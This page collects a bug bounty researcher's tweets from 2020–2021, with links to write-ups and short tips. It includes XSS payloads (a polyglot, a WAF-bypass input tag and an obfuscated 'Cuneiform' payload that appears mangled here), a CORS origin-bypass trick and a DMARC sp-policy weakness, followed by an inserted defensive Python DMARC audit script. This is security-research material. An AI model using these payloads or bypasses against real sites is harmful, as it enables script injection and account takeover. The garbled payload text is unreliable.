Contents
Top 25 Vulnerability Parameters based on frequency
— Lütfü Mert Ceylan (@lutfumertceylan) February 6, 2021
Vulnerable parameters including SQLi, XSS, SSRF, RCE, XSS, Open Redirect that can be used in automation tools or manual recon. 🛡️🧙‍♂️ https://t.co/D7j9jXfinM #bugbounty #bugbountytips #cybersecurity
a Javascript Polyglot for Cross-Site Scripting (XSS) 🛡️
— Lütfü Mert Ceylan (@lutfumertceylan) January 25, 2021
<video src=">" onerror=setTimeout`confirm\x281\x29`>
-unicoded chars
-DOM window
-uncommon tags for filters
-various mimics #bugbounty #bugbountytips #cybersecurity pic.twitter.com/d7mOadnFRq
Account Takeover via Web Cache Poisoning based Reflected XSS
— Lütfü Mert Ceylan (@lutfumertceylan) December 27, 2020
I wrote a write-up about combining Web Cache Poisoning with rXSS vulnerability. In this way, the impact has been escalated. 🧙‍♂️ https://t.co/19UaCTiPqo #bugbounty #bugbountytips #cybersecurity
If you are curious about the working structure of this payload, you can find out with this tool. (thanks to @aemkei) https://t.co/RCvxWOiuoT pic.twitter.com/Hqa0myKfmQ
— Lütfü Mert Ceylan (@lutfumertceylan) December 14, 2020
an XSS payload, Cuneiform-alphabet based
— Lütfü Mert Ceylan (@lutfumertceylan) December 14, 2020
π='',πΊ=!π+π,π=!πΊ+π,πΊ=π+{},π=πΊ[π++],
π=πΊ[π«=π],π=++π«+π,πΉ=πΊ[π«+π],πΊ[πΉ+=πΊ[π]
+(πΊ.π+πΊ)[π]+π[π]+π+π+πΊ[π«]+πΉ+π+πΊ[π]
+π][πΉ](π[π]+π[π«]+πΊ[π]+π+π+"(π)")()#bugbounty #bugbountytips #cybersecurity pic.twitter.com/dYFmWlEAR8
a Python Snippet to try Race Condition weakness in Turbo Intruder
— Lütfü Mert Ceylan (@lutfumertceylan) October 27, 2020
Source: https://t.co/bdf5EKQGqE #bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity pic.twitter.com/VpuKF7DlQt
an XSS payload generated using JSfuck, for bypassing attribute filters
— Lütfü Mert Ceylan (@lutfumertceylan) October 23, 2020
Source: https://t.co/8W2jok2ZvM #bugbounty #bugbountytips #bugbountytip #cybersecurity #infosec pic.twitter.com/hOORASpbcZ
an XSS payload to bypass some WAF & filters in Firefox
— Lütfü Mert Ceylan (@lutfumertceylan) October 4, 2020
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;"> #bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity #ethicalhacking pic.twitter.com/YwxpP715Rq
I wrote a write-up about Clickjacking vulnerability. This vulnerability causes Account Takeover weakness. 🧙‍♂️ https://t.co/tkf72QfHop #bugbounty #bugbountytips #ethicalhacking #cybersecurity #infosec #bugbountytip
— Lütfü Mert Ceylan (@lutfumertceylan) September 27, 2020
I wrote a write-up about content spoofing vulnerability I found. This vulnerability could lead to users being manipulated. I know that this vulnerability is simple and very low impact. :) https://t.co/oLMVSyWbKW #bugbounty #bugbountytips #ethicalhacking #cybersecurity #infosec
— Lütfü Mert Ceylan (@lutfumertceylan) August 11, 2020
Information after some simple GitHub research..
— Lütfü Mert Ceylan (@lutfumertceylan) July 27, 2020
GitHub is really like a black hole 🧙‍♂️ #bugbounty #bugbountytips #cybersecurity #infosec pic.twitter.com/z9cX4FQE5p
Due to DMARC Functions, sp Parameter Weakness
— Lütfü Mert Ceylan (@lutfumertceylan) July 20, 2020
If the value of the sp parameter is "none", weakness occurs even if the value of p is not "none".
[email protected] --> Not Vulnerable
[email protected] --> Vulnerable #bugbounty #bugbountytips #bugbountytip #cybersecurity #infosec pic.twitter.com/4PJIwobMpj
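An added example, not part of the original tweet: a small Python audit of DMARC TXT records for the `sp` weakness described above. The domains and records are constructed samples, and the fallback of `sp` to `p` when `sp` is absent follows RFC 7489.

```python
# Added example: flag DMARC records whose subdomain policy (sp) is "none"
# while the organizational-domain policy (p) is stricter.
STRENGTH = {"none": 0, "quarantine": 1, "reject": 2}


def parse_dmarc(record):
    """Parse a DMARC TXT record into a dict of lower-cased tag -> value."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC1 record")
    return tags


def audit(record):
    """Return (domain_policy, subdomain_policy, findings) for one record."""
    tags = parse_dmarc(record)
    p = tags.get("p", "").lower()
    if p not in STRENGTH:
        raise ValueError("missing or invalid p tag")
    # When sp is absent, subdomains inherit the p policy (RFC 7489).
    sp = tags.get("sp", p).lower()
    if sp not in STRENGTH:
        raise ValueError("invalid sp tag")
    findings = []
    if p == "none":
        findings.append("p=none: monitoring only, no enforcement")
    if sp == "none" and p != "none":
        findings.append(f"sp=none: subdomains are not enforced although p={p}")
    return p, sp, findings


# Constructed sample records for reserved example domains.
SAMPLES = {
    "strict.example": "v=DMARC1; p=reject; sp=reject; rua=mailto:dmarc@strict.example",
    "inherit.example": "v=DMARC1; p=quarantine",
    "weak-sub.example": "v=DMARC1; p=reject; sp=none",
}

if __name__ == "__main__":
    for domain, record in SAMPLES.items():
        p, sp, findings = audit(record)
        print(f"{domain}: p={p} sp={sp} -> {findings or 'ok'}")
```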
How can you make a Javascript Polyglot for XSS? #BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked pic.twitter.com/qmd3qUpQ2g
— Lütfü Mert Ceylan (@lutfumertceylan) July 17, 2020
I was included in the Hall of Fame (1st quarter) by Mozilla! 🥳 https://t.co/IpMxI18LCm #bugbounty #infosec #ethicalhacking #CyberSecurity #halloffame
— Lütfü Mert Ceylan (@lutfumertceylan) July 12, 2020
I wrote a write-up about CORS vulnerability. This vulnerability causes both Account Takeover and Sensitive Data Leakage weakness. 🛡️🧙‍♂️ https://t.co/zaoorAh1cD #bugbounty #bugbountytips #ethicalhacking #cybersecurity #infosec
— Lütfü Mert Ceylan (@lutfumertceylan) July 4, 2020
🛡️ CORS Protection Bypass 🛡️
— Lütfü Mert Ceylan (@lutfumertceylan) July 1, 2020
If the system only allows "Origin: https://t.co/YB5OiaWlDW",
Use a gTLD containing "com" -> Origin: https://t.co/S0FQ43tWro #bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking